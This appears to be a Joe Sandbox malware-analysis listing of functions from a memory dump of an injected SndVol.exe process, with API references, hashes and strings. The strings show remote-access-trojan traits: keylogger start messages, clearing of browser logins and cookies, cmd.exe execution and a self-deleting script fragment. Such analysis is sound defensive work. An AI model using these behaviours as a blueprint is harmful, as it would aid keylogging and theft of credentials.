                                                                                                                        • Opcode ID: 355243fb2184dfd14d4a520184ead661c811c6b5a239ad49f5ae401f42ada6ba
                                                                                                                        • Instruction ID: 96cb22b2b15141d2bb23b879eae0c5c23c12bd03188204b2ee7b5b78c01c12bf
                                                                                                                        • Opcode Fuzzy Hash: 355243fb2184dfd14d4a520184ead661c811c6b5a239ad49f5ae401f42ada6ba
                                                                                                                        • Instruction Fuzzy Hash: 5EF0BD73948200BB8660EE5CF4C9D3A73FEAB807647684C09F45AD7941CB35F8D18E64
                                                                                                                        Function 029632E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 02963305
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 02963317
                                                                                                                        • _free.LIBCMT ref: 0296332A
                                                                                                                        • _free.LIBCMT ref: 0296333B
                                                                                                                        • _free.LIBCMT ref: 0296334C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: fd5b64d8184f9bf867598dc59e8f0b1fb90114cb1695879bfe5cbab466319fd2
                                                                                                                        • Instruction ID: f21638097bcdb8abae8a919ee908617465e8792613978b52e91f0c451a98b940
                                                                                                                        • Opcode Fuzzy Hash: fd5b64d8184f9bf867598dc59e8f0b1fb90114cb1695879bfe5cbab466319fd2
                                                                                                                        • Instruction Fuzzy Hash: 54F05E74C8E2219F9A02AF1CFD084B93BBDB7947703880946F41952664EB3A0C75DFA5
                                                                                                                        Function 029329AA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02932A1D
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02932A4C
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 02932AED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                                        • String ID: [regsplt]
                                                                                                                        • API String ID: 3554306468-4262303796
                                                                                                                        • Opcode ID: 5b78ba0773ef180cca5bfa325c75aeee2dbfe0ecb36faab69daadd6c2c47028d
                                                                                                                        • Instruction ID: 0aa0532b2d715f24f556f5d2c22afd26ff0abedca0ebdfc7733f690867036364
                                                                                                                        • Opcode Fuzzy Hash: 5b78ba0773ef180cca5bfa325c75aeee2dbfe0ecb36faab69daadd6c2c47028d
                                                                                                                        • Instruction Fuzzy Hash: 39511972108355AFD315EB60D890DEBB3EDEFC4714F40092EB99A82150EB70EA0D8B62
                                                                                                                        Function 0296D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strpbrk.LIBCMT ref: 0296D4A8
                                                                                                                        • _free.LIBCMT ref: 0296D5C5
                                                                                                                          • Part of subcall function 0295A854: IsProcessorFeaturePresent.KERNEL32(00000017,0295A826,0292E5AC,?,?,029942F8,00000000,00000000,00000000,?,0295A846,00000000,00000000,00000000,00000000,00000000), ref: 0295A856
                                                                                                                          • Part of subcall function 0295A854: GetCurrentProcess.KERNEL32(C0000417,?,0292E5AC,029942E0), ref: 0295A878
                                                                                                                          • Part of subcall function 0295A854: TerminateProcess.KERNEL32(00000000,?,0292E5AC,029942E0), ref: 0295A87F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                        • String ID: *?$.
                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                        • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                        • Instruction ID: 5e6cef39b6fdfc891ee6dedef2510dda5dd436cebc8774ec1fa2492497b763a7
                                                                                                                        • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                        • Instruction Fuzzy Hash: 6A518F71E00209AFDF14DFA8C884ABDB7F9EF88314F24416AD964E7744E775AA018B60
                                                                                                                        Function 029626D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 02962714
                                                                                                                        • _free.LIBCMT ref: 029627DF
                                                                                                                        • _free.LIBCMT ref: 029627E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                                                                        • API String ID: 2506810119-3942169294
                                                                                                                        • Opcode ID: 0fb455f0d214d44435f788d8396e6e42a715d03e1506d1d8eb5eb781650b1308
                                                                                                                        • Instruction ID: 68bfbf02130ad402c9bec5822fd6199376d9bde9d1fb1b0bf6b0c1ae2ee19eef
                                                                                                                        • Opcode Fuzzy Hash: 0fb455f0d214d44435f788d8396e6e42a715d03e1506d1d8eb5eb781650b1308
                                                                                                                        • Instruction Fuzzy Hash: 37317E71E04259AFDB21DF99D988DBEBBFDEB85760F1444A6EC0897200D7709A41CFA0
                                                                                                                        Function 029298A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,029299A9,?,00000000,00000000), ref: 0292992A
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0292993A
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,029299B5,?,00000000,00000000), ref: 02929946
                                                                                                                          • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
                                                                                                                          • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                                        • String ID: Offline Keylogger Started
                                                                                                                        • API String ID: 465354869-4114347211
                                                                                                                        • Opcode ID: 34c78a9bd365c95a48614bc7635baa2b4ddce4cad9b423006f98f4ed7f19cf50
                                                                                                                        • Instruction ID: 04c6fede49ec922272697718721f940984dbb8fe632f551d11b3d3a1b5613148
                                                                                                                        • Opcode Fuzzy Hash: 34c78a9bd365c95a48614bc7635baa2b4ddce4cad9b423006f98f4ed7f19cf50
                                                                                                                        • Instruction Fuzzy Hash: 9B118AB65003287EF624FA35DC85CBF7B5DDAC12B4F40052DF85A16586DA605E1CCAF2
                                                                                                                        Function 0292A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0292A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
                                                                                                                          • Part of subcall function 0292A876: wsprintfW.USER32 ref: 0292A905
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0292A691
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,029299B5,?,00000000,00000000), ref: 0292A69D
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,029299C1,?,00000000,00000000), ref: 0292A6A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                        • String ID: Online Keylogger Started
                                                                                                                        • API String ID: 112202259-1258561607
                                                                                                                        • Opcode ID: 363054efbd0ade6e5aa9facf3a4102e144bed0d7f5f78ede9d46fdd425318640
                                                                                                                        • Instruction ID: d4e50c159e6c7b794e6132d6c029d36420a64f334a1c800b2e73cfa5151e7880
                                                                                                                        • Opcode Fuzzy Hash: 363054efbd0ade6e5aa9facf3a4102e144bed0d7f5f78ede9d46fdd425318640
                                                                                                                        • Instruction Fuzzy Hash: 1C01F995B002693EF730B6758CCADBF7E6ECBC12B8F41042CF5462614ADA545D0D86F1
                                                                                                                        Function 02924B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,02924B26), ref: 02924B40
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,02924B26), ref: 02924B98
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,02924B26), ref: 02924BA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                                        • String ID: Connection Timeout
                                                                                                                        • API String ID: 2055531096-499159329
                                                                                                                        • Opcode ID: beed1795ae3d0f7fcca1a144e6a6d0b6af277a0431619e6320e220be0c89fdd9
                                                                                                                        • Instruction ID: eb0f8c93adc824592c5437a743d9e71367e1e2a03176576048f283554f90b035
                                                                                                                        • Opcode Fuzzy Hash: beed1795ae3d0f7fcca1a144e6a6d0b6af277a0431619e6320e220be0c89fdd9
                                                                                                                        • Instruction Fuzzy Hash: 06014775A84B51DFE726BB79CC454AEFFE9EF41614340092EE0E382A24CB609418CF52
                                                                                                                        Function 029264D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • C:\Windows\SysWOW64\SndVol.exe, xrefs: 02926927
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                                                                        • API String ID: 0-3942169294
                                                                                                                        • Opcode ID: d2607897ca5a91a94dcdd743bb0b6ba12ca2ab8dfd9ef9fc11e8d0b8ef52de5c
                                                                                                                        • Instruction ID: 06b32d3b1d2a8d6d56012d5309faa9ad505a84c94e3f2e2531fe83d922c7f8e0
                                                                                                                        • Opcode Fuzzy Hash: d2607897ca5a91a94dcdd743bb0b6ba12ca2ab8dfd9ef9fc11e8d0b8ef52de5c
                                                                                                                        • Instruction Fuzzy Hash: C1F09034E853319BDE042B7CA81977A368EAB90366F410865F556EAA58EB214829CB90
                                                                                                                        Function 02932774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,029942E0), ref: 0293277F
                                                                                                                        • RegSetValueExW.ADVAPI32(029942E0,?,00000000,00000001,00000000,00000000,029942F8,?,0292E5CB,pth_unenc,029942E0), ref: 029327AD
                                                                                                                        • RegCloseKey.ADVAPI32(029942E0,?,0292E5CB,pth_unenc,029942E0), ref: 029327B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValue
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                                        • Opcode ID: d7dde67f549f7812fbe610afc8e85cf9c51f55caf35c560d83052d734b9070f1
                                                                                                                        • Instruction ID: 825dcb93c0414ee87ce4cbf2a56f2262c548bf4eef4f94d39cc000023a3880d9
                                                                                                                        • Opcode Fuzzy Hash: d7dde67f549f7812fbe610afc8e85cf9c51f55caf35c560d83052d734b9070f1
                                                                                                                        • Instruction Fuzzy Hash: DCF09071940128BBDF119FB0ED45FEE776CEF80750F104914F90296050E7719F18DAA0
                                                                                                                        Function 029351B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 029351F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: /C $cmd.exe$open
                                                                                                                        • API String ID: 587946157-3896048727
                                                                                                                        • Opcode ID: 348de00abdfb99bde4418e9d3963577bed1b41558f30aadadb0bed76e0c9aa4e
                                                                                                                        • Instruction ID: fe49cdfc27c7f732cebec29a4d3d92b473625ff949264bf7f60881c272714ef8
                                                                                                                        • Opcode Fuzzy Hash: 348de00abdfb99bde4418e9d3963577bed1b41558f30aadadb0bed76e0c9aa4e
                                                                                                                        • Instruction Fuzzy Hash: 7DE0C970104310AA9608FA60ECA4DBFB7AE9AD0744B45581DB04B921A9DE64A91D8A15
                                                                                                                        Function 0292AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TerminateThread.KERNEL32(029299A9,00000000,029942F8,pth_unenc,0292BF26,029942E0,029942F8,?,pth_unenc), ref: 0292AFC9
                                                                                                                        • UnhookWindowsHookEx.USER32(029940F8), ref: 0292AFD5
                                                                                                                        • TerminateThread.KERNEL32(02929993,00000000,?,pth_unenc), ref: 0292AFE3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 3123878439-4028850238
                                                                                                                        • Opcode ID: 016abb7ce2206921f0add546e2069cc5530a36fbf0c2a928caa4d79fb541caaa
                                                                                                                        • Instruction ID: b5413830468bbfd111a12b45a53d046f77338bc9549907bfff16493913befbd1
                                                                                                                        • Opcode Fuzzy Hash: 016abb7ce2206921f0add546e2069cc5530a36fbf0c2a928caa4d79fb541caaa
                                                                                                                        • Instruction Fuzzy Hash: 65E0EC76689226EFF3205F94AC888B5FBAAEB94299324087DB6C292114C6754C5CCB60
                                                                                                                        Function 029759CA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 27c8a2a39ecb4bc9a915f96ccc51b225eb59108e468997b8698acf9aa1e65003
                                                                                                                        • Instruction ID: abf38e82609aae6ad84f7f6e93fb7773722005d256e139d6769b1ff0e7d4b18e
                                                                                                                        • Opcode Fuzzy Hash: 27c8a2a39ecb4bc9a915f96ccc51b225eb59108e468997b8698acf9aa1e65003
                                                                                                                        • Instruction Fuzzy Hash: 36415171A00101ABDF696B788CC8FBE3BEAEF81770F9A0565FC18D7190E77445588AA1
                                                                                                                        Function 02961A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 885a3f88ff2ef5bfe2ea3bb94f90a325f0c569029b4a3e3ea6acfa9f04615764
                                                                                                                        • Instruction ID: b290645b62e4ad8303363319af4847fc84672b3514e226aa101c7b607f30a584
                                                                                                                        • Opcode Fuzzy Hash: 885a3f88ff2ef5bfe2ea3bb94f90a325f0c569029b4a3e3ea6acfa9f04615764
                                                                                                                        • Instruction Fuzzy Hash: 7641E672A00704AFD7249F78CC48BBABBEAEF84710F10452EE159DB790E7B295118B90
                                                                                                                        Function 02924688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 02924778
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0292478C
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 02924797
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 029247A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3360349984-0
                                                                                                                        • Opcode ID: 7704b5e189cb03239e29c4c29f34cd0b8cc3cff56c293c0a8a4898b09aca4b21
                                                                                                                        • Instruction ID: ddf7e80e6baa6ab72f9faf685f17acf730091257b823f7bb2cf3aa063277a99c
                                                                                                                        • Opcode Fuzzy Hash: 7704b5e189cb03239e29c4c29f34cd0b8cc3cff56c293c0a8a4898b09aca4b21
                                                                                                                        • Instruction Fuzzy Hash: 14418071608360ABC714FB64DC54DBFB7EEAFD5720F000A1DF8A682195EB64D91C8B62
                                                                                                                        Function 0292B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • [Cleared browsers logins and cookies.], xrefs: 0292B8DE
                                                                                                                        • Cleared browsers logins and cookies., xrefs: 0292B8EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                        • API String ID: 3472027048-1236744412
                                                                                                                        • Opcode ID: 6eb2c277b74c6a1f851b581cd245c77be719be57387d8f2a152ee9abc84e7b76
                                                                                                                        • Instruction ID: e37dd08a603c0dace552cb396d5daf6c400456a343c66265f6215d4d275082db
                                                                                                                        • Opcode Fuzzy Hash: 6eb2c277b74c6a1f851b581cd245c77be719be57387d8f2a152ee9abc84e7b76
                                                                                                                        • Instruction Fuzzy Hash: BC31C11564C3A16ADA127BB814367EA7FDB4ED366CF09445CE8DC0B38ADA52440C97A3
                                                                                                                        Function 0293B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0293B5EB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0293B5FF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0293B60C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3604237281-0
                                                                                                                        • Opcode ID: f87b38e5f4675fb6877055c6426cde7e8363e016c9c7a6f1ce93c831fc093308
                                                                                                                        • Instruction ID: 5fcc5bcd2b6d094619aa38a0e19fd3fa9e2b557feacda9ebad2333edc278cfdf
                                                                                                                        • Opcode Fuzzy Hash: f87b38e5f4675fb6877055c6426cde7e8363e016c9c7a6f1ce93c831fc093308
                                                                                                                        • Instruction Fuzzy Hash: A801F5722492157FE6124D68EC99FBBB39DEB8237CF100A2DF661D21C0D7218D098631
                                                                                                                        Function 029580F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0295810F
                                                                                                                          • Part of subcall function 0295805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0295808B
                                                                                                                          • Part of subcall function 0295805C: ___AdjustPointer.LIBCMT ref: 029580A6
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 02958124
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02958135
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0295815D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction ID: 70170094aeaedb2be58834f341a4a59498645b4b925b8ceb4c0d3955a36b8ec0
                                                                                                                        • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                        • Instruction Fuzzy Hash: F4010C32200118BBDF129EA5DD45EEB7B6EFF88754F044518FE48A6120D736E8A1DBA4
                                                                                                                        Function 02967210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,029942F8,00000000,00000000,?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue), ref: 02967242
                                                                                                                        • GetLastError.KERNEL32(?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue,0297D328,FlsSetValue,00000000,00000364,?,02966F91), ref: 0296724E
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,029671B7,029942F8,00000000,00000000,00000000,?,029674E3,00000006,FlsSetValue,0297D328,FlsSetValue,00000000), ref: 0296725C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
